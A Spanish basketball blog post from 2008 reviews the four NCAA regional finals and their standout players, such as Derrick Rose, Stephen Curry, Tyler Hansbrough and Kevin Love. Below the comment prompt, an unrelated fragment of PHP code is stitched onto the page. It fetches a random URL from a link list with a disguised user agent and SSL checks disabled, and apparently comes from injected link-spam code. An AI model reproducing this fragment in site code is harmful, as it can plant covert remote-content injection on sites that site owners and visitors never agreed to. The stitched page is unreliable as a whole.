Ya tenemos equipos para la Final Four

31 de March de 2008 por txusma

UCLA, North Carolina, Kansas y Memphis. Ni Stephen Curry, ni los hermanos López, ni Rick Pitino, ni los otros 58 equipos que han disputado la March Madness han podido dar la sorpresa y los 4 equipos que partían como cabezas de serie en cada una de sus divisiones han sido finalmente los clasificados por primera vez en la historia. Pero no ha sido un camino de rosas para nadie y hemos tenido emoción hasta el final. Ahora a descansar, que el próximo fin de semana se decide todo.

Texas 67 – 85 Memphis

Derrick Rose (21 puntos, 6 rebotes y 9 asistencias) fue nombrado MVP de su división y los aficionados le despidieron al grito de “One more year!” (un año más). En lo que se esperaba un partido mucho más igualado de lo que realmente fue, Rose se movió como pez en el agua y junto Chris Douglas-Roberts (25 puntos) liquidaron a unos Longhorns que solo pudieron anotar el 36% de sus lanzamientos. Rose anotó sus 4 primeros tiros y taponó una penetración de la estrella rival (DJ Agustine) dejando claro rápidamente que en Texas no había nadie que pudiera pararlo y que aquel iba a ser su partido. Agustine (primera ronda en los mocks) cuajó una muy mala actuación con 16 puntos pero 4 de 18 en tiros de campo y más pérdidas (4) que asistencias (3). Ahora Rose se verá las caras con otro jugador impresionante, Kevin Love, en las que serán, seguramente, unas semifinales apasionantes.

Davidson 57 – 59 Kansas

Y Goliath pudo con… Stephen Curry. Si había un jugador en toda la NCAA que escogería para jugarse el último tiro ese sería, sin dudarlo, el espigado escolta de Davidson. Pero los Jayhawks también lo sabían y no dejaron a Curry hacer ese último lanzamiento, que podría haber dado la victoria a su equipo o como mínimo llegar a la prórroga. Curry tan solo pudo pasar el balón a su compañero Jason Richards y ver como éste lo erraba. Cruel final para los Wildcats y cruel final para Curry. Como consuelo le queda haber sido nombrado MVP de su división y haberse convertido en el 4º jugador de la historia en anotar más de 30 puntos en cada uno de sus primeros 3 partidos. El guión del partido estaba escrito de antemano: defensa formidable sobre Curry (4 jugadores se turnaban para cubrirlo) que el resto se defienden solos. Kansas llega a la Final Four ofreciendo muchas dudas y sin dar la misma sensación de poderío que sus 3 compañeros en la ronda final.

Lousiville 73 – 83 North Carolina

Preguntábamos hace un tiempo si Tyler Hansbrough se convertiría en una figura universitaria. La verdad es que va camino de conseguirlo, después del doble-doble (28 puntos, 13 rebotes) que se marcó en la final de su división. Partidos como éste son los que encumbran a un jugador. Hansbroug es un jugador con mayúsculas, realmente inteligente, capaz de hacer muchísimas cosas sobre una cancha de baloncesto y ayer lo volvió a demostrar, encontrando salida a cualquier situación anómala en el ataque de su equipo. El base Ty Lawson (otro jugador que aparece en la primera ronda de los mocks) fue su perfecto escudero con 11 puntos y 9 asistencias , anotando un triple clave a falta de 5 minutos para el final del partido. Enfrente un equipo rocoso, muy intenso como cualquiera que entrena Rick Pitino pero que esta vez se vio superado por la calidad de Hansbrough y de los Tar Heels en general, como demuestra el 53% en acierto del tiro, el primer equipo que sobrepasa el 50% frente a los Cardinals. Jerry Smith, con 17 puntos fue su jugador más destacado. Sobra decir que Tyler fue nombrado MVP de su división.

Xavier 57 – 76 UCLA

Tras alcanzar la Final Four por tercera vez consecutiva, el entrenador de los Bruins declaró “Éste es el mejor equipo de los 3”. Tal vez la diferencia con los otros 2 equipos es que aquellos no contaban con un tal Kevin Love, que con 19 puntos y 10 rebotes, volvió a ser el jugador más determinante del partido y fue nombrado MVP de su división. Xavier no fue rival para UCLA en ningún momento y se quedó en un triste 36% de acierto en el tiro, producto de la intensidad defensiva de su rival. Junto a Love destacaron también Darren Collison (19 puntos, 5 asistencias), jugador que también aparece en primera ronda en los mocks de este año y Russell Westbrook (19 puntos). Por parte de los Musketeers Josh Duncan no pudo repetir buena actuación y Derrick Brown se convirtió en su hombre más destacado con tan solo 13 puntos y 6 rebotes.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>